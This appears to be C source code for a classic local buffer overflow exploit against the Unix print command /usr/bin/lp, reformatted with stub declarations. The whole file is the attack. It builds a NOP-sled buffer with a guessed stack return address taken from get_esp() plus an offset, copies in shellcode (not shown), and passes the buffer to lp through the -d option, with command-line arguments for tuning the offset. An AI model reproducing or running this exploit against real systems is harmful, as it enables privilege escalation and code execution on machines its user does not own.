
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFSIZE ;
 int atoi (char*) ;
 int execl (char*,char*,char*,char*,char*,char*,int *) ;
 int get_esp () ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int,int) ;
 int printf (char*,int) ;
 char* shellcode ;
 int strlen (char*) ;

int main(int argc, char *argv[]) {

  char buff[BUFSIZE];
  int nopcount=501, offset=260;
  int i;

  if (argc > 1) offset = atoi(argv[1]);
  if (argc > 2) nopcount = atoi(argv[2]);

        memset (buff, 0x90, BUFSIZE);

                for (i = nopcount; i < BUFSIZE - 4; i += 4)
                *(long *) &buff[i] = get_esp() + offset;
        memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen
        (shellcode));

            memcpy (buff, ":", 1);
            printf("Addr = 0x%x\n", get_esp() + offset);
         execl("/usr/bin/lp", "lp", "-d", buff, "-p", "/tmp/ps_data",((void*)0));
}
